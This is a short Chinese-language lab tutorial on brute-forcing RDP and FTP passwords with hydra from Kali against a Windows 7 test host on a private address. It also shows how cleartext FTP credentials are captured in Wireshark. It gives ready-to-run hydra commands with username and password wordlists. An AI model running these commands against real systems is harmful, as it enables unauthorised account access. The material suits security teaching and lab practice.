rdp、ftp协议的密码爆破

远程桌面 rdp协议 3389

文件传输 FTP协议 20 21

攻击方：Kali

测试方：Win7

两台都要在同一网段

密码爆破工具 hydra九头蛇

hydra（九头蛇）是著名黑客组织thc的一款开源的暴力破解密码工具，功能非常强大，kali下是默认安装的，几乎支持所有协议的在线破解。密码能否破解，在于字典是否强大。

爆破远程桌面

# hydra -l 某个用户名 -P 密码字典.txt rdp://192.168.241.130 -Vv
hydra -l zs -P top1000.txt rdp://192.168.241.130 -Vv

# hydra -L 用户名字典.txt -P 密码字典.txt   rdp://192.168.241.130 -Vv
# hydra -L 用户字典.txt -p 单个字典  rdp://192.168.241.130 -Vv

# 参数
-l  用户名
-L 用户名字典.txt
-P 密码字典.txt
-p 单个密码
-Vv 显示爆破过程

爆破ftp服务器密码

hydra -l zs -P top1000.txt ftp://192.168.241.130 -Vv

wireshark抓包

先打开wireshark，开始抓包，然后在ftp客户端连接ftp服务端的那一刻，wireshark抓到包，过滤出ftp协议的包

FTP是一种用于在网络上传输文件的标准协议。它允许用户通过使用FTP客户端和FTP服务器之间建立的连接来上传和下载文件。FTP可以在匿名或经过身份验证的方式下使用，支持对文件和目录进行管理，包括创建、删除、重命名等操作。
然而，FTP是基于明文传输的，存在安全风险，因为用户名、密码和数据都以明文形式传输，所以使用FTP时需要谨慎处理敏感信息。